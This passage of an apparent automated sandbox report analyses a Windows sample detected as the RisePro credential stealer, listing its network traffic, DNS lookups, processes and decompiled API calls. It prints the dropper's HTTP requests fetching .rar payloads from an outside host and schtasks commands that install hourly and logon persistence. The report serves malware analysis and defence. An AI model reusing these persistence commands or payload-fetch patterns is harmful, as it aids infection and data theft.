Jul 25, 2024 05:10:41.348026991 CEST	49731	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:41.348862886 CEST	49731	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:41.353646994 CEST	799	49731	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:44.095956087 CEST	49732	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:44.101151943 CEST	799	49732	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:44.101273060 CEST	49732	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:44.101511002 CEST	49732	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:44.106270075 CEST	799	49732	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:44.519879103 CEST	799	49732	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:44.519984007 CEST	49732	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:44.519989014 CEST	799	49732	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:44.520148993 CEST	49732	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:44.521239996 CEST	49732	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:44.526108027 CEST	799	49732	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:52.825170040 CEST	50500	49728	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:52.825249910 CEST	49728	50500	192.168.2.5	193.233.132.62

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 05:09:54.991218090 CEST	50908	53	192.168.2.5	1.1.1.1
Jul 25, 2024 05:09:55.086487055 CEST	53	50908	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 05:09:54.991218090 CEST	192.168.2.5	1.1.1.1	0x7868	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 05:09:55.086487055 CEST	1.1.1.1	192.168.2.5	0x7868	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	44.221.84.105	799	6484	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:09:55.123308897 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	44.221.84.105	799	6484	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:09:58.946476936 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	44.221.84.105	799	6484	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:10:01.830205917 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49727	44.221.84.105	799	2516	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:10:29.968799114 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49729	44.221.84.105	799	2516	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:10:32.504376888 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49730	44.221.84.105	799	2516	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:10:37.839843988 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49731	44.221.84.105	799	2516	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:10:40.968962908 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49732	44.221.84.105	799	2516	C:\Users\user\AppData\Local\Temp\jHYZko.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 05:10:44.101511002 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	23:09:53
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe"
Imagebase:	0xfb0000
File size:	3'146'240 bytes
MD5 hash:	EE50F2DB274C7ABDBAE3713A14020C24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	23:09:53
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
Imagebase:	0xe60000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs Detection: 90%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:09:55
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0x2d0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:09:55
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:09:56
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0x2d0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:09:56
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:09:57
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0x570000
File size:	3'146'240 bytes
MD5 hash:	EE50F2DB274C7ABDBAE3713A14020C24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs Detection: 86%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	23:09:58
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0x570000
File size:	3'146'240 bytes
MD5 hash:	EE50F2DB274C7ABDBAE3713A14020C24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	23:10:02
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612
Imagebase:	0x5a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	23:10:28
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Imagebase:	0x8c0000
File size:	3'146'240 bytes
MD5 hash:	EE50F2DB274C7ABDBAE3713A14020C24
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs Detection: 86%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	23:10:28
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
Imagebase:	0x1e0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	23:10:46
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	23:10:46
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	2.6%
Signature Coverage:	8.9%
Total number of Nodes:	305
Total number of Limit Nodes:	23

Executed Functions

Function 01ADA044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01ADA223
WriteFile.KERNELBASE(00000000,FFFFDB4B,00003E00,?,00000000), ref: 01ADA252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 01ADA256
WinExec.KERNEL32(?,00000005), ref: 01ADA262

Strings

Clos, xrefs: 01ADA129
el32, xrefs: 01ADA0FB
Kern, xrefs: 01ADA0F4
catA, xrefs: 01ADA1AF
lstr, xrefs: 01ADA1A7
athA, xrefs: 01ADA199
jHYZko.exe, xrefs: 01ADA1FD, 01ADA200
Writ, xrefs: 01ADA148
GetT, xrefs: 01ADA188
odul, xrefs: 01ADA22D
dleA, xrefs: 01ADA0D0
Crea, xrefs: 01ADA169
.dll, xrefs: 01ADA102
GetM, xrefs: 01ADA0B6
WinE, xrefs: 01ADA110

Memory Dump Source

Source File: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$jHYZko.exe$lstr$odul
API String ID: 2234911746-2918638317
Opcode ID: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
Instruction ID: 0425f0a3f13bba014969d6b7281055ff48f863a95e029a7a267b9dc5df1ea8f1
Opcode Fuzzy Hash: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
Instruction Fuzzy Hash: EE612D75D01716DFCF25CFA8C884AAEFBB0BF45355F1582AAE506AB241C3709A81CB91

Function 00FCDB60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00FCDB8A
getaddrinfo.WS2_32(?,?,?,50500), ref: 00FCDC0C
socket.WS2_32(?,?,?), ref: 00FCDC2D
connect.WS2_32(00000000,?,?), ref: 00FCDC41
closesocket.WS2_32(00000000), ref: 00FCDC4D
FreeAddrInfoW.WS2_32(?), ref: 00FCDC5A
WSACleanup.WS2_32 ref: 00FCDC60
FreeAddrInfoW.WS2_32(?), ref: 00FCDC75

Strings

50500, xrefs: 00FCDBE8

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: AddrFreeInfo$CleanupStartupclosesocketconnectgetaddrinfosocket
String ID: 50500
API String ID: 448659506-2230786414
Opcode ID: c6d10d9c020266da2ec55303449e8d7dcd22cb129d925c939ca34162db8897d3
Instruction ID: a0713b17bac363d3b7dd6cee9decf18312b2a3b330b57821b9cffb4a8dec8984
Opcode Fuzzy Hash: c6d10d9c020266da2ec55303449e8d7dcd22cb129d925c939ca34162db8897d3
Instruction Fuzzy Hash: D731C1729053419BD7209F24DD89B6EB7E5FF88B34F404B2DF8A492290D3769904DB92

Function 010A2F0C Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010A2622: GetConsoleOutputCP.KERNEL32(C66D7777,00000000,00000000,?), ref: 010A2685

WriteFile.KERNELBASE(?,00000000,01096AF7,?,00000000,00000000,00000000,?,00000000,?,0108C023,01096AF7,00000000,0108C023,?,?), ref: 010A3091
GetLastError.KERNEL32(?,01096AF7,00000000,?,0108C023,?,00000000,00000000), ref: 010A309B

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 3b9f435f2e44c98c66d94c32fd009c3eac640272b33abcf7c71f35ad061d8ab6
Instruction ID: baf1b9823331740acca16afdf427b163e54649d28ec0958f3812f1cdc14a4288
Opcode Fuzzy Hash: 3b9f435f2e44c98c66d94c32fd009c3eac640272b33abcf7c71f35ad061d8ab6
Instruction Fuzzy Hash: 1E61907190410AAFDF11DFE8C884EEEBFF9BF19304F4401A5E984AB246D776D9418BA0

Function 010A2582 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,010A2469,00000000,CF830579,010E1148,0000000C,010A2525,0109662D,?), ref: 010A25D8
GetLastError.KERNEL32(?,010A2469,00000000,CF830579,010E1148,0000000C,010A2525,0109662D,?), ref: 010A25E2

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: d14cd48d84418a85dd22e2dc53b04df82304b0b0baf09c2545bd631600395321
Instruction ID: 58fde4ffb23055f1f800653dc968af960cafcc8491c69104ba21f2f5c8d75272
Opcode Fuzzy Hash: d14cd48d84418a85dd22e2dc53b04df82304b0b0baf09c2545bd631600395321
Instruction Fuzzy Hash: B0118E3360421056D67532FC5C58BBD3BC9BB86734FA902AAF9DA8F1C2EE71D8C08255

Function 0109BACC Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,010E0E00,0108C023,00000002,0108C023,00000000,?,?,?,0109BBD6,00000000,?,0108C023,00000002,010E0E00), ref: 0109BB08
GetLastError.KERNEL32(0108C023,?,?,?,0109BBD6,00000000,?,0108C023,00000002,010E0E00,00000000,0108C023,00000000,010E0E00,0000000C,01096BCE), ref: 0109BB15

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 92bf849b73a6c858d523b24c30bd88aead3c77f7c548daa6364456c61df35c11
Instruction ID: d985cd714397236b6c19a6cac90e51319b60e907108db90ceed27db64662a100
Opcode Fuzzy Hash: 92bf849b73a6c858d523b24c30bd88aead3c77f7c548daa6364456c61df35c11
Instruction Fuzzy Hash: C0014932610149AFCF198F5EDC55DEE3F69EB85330B240148F8919B2D1EAB1E941DB90

Function 010A379C Relevance: 2.6, APIs: 2, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,0109ACB4,010A48E0,?,?,0108E0EB,?,?,?,?,?,00FB2D8D,0108B16C,?,?), ref: 010A37A0
SetLastError.KERNEL32(00000000,?,?,0108B16C), ref: 010A3842

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
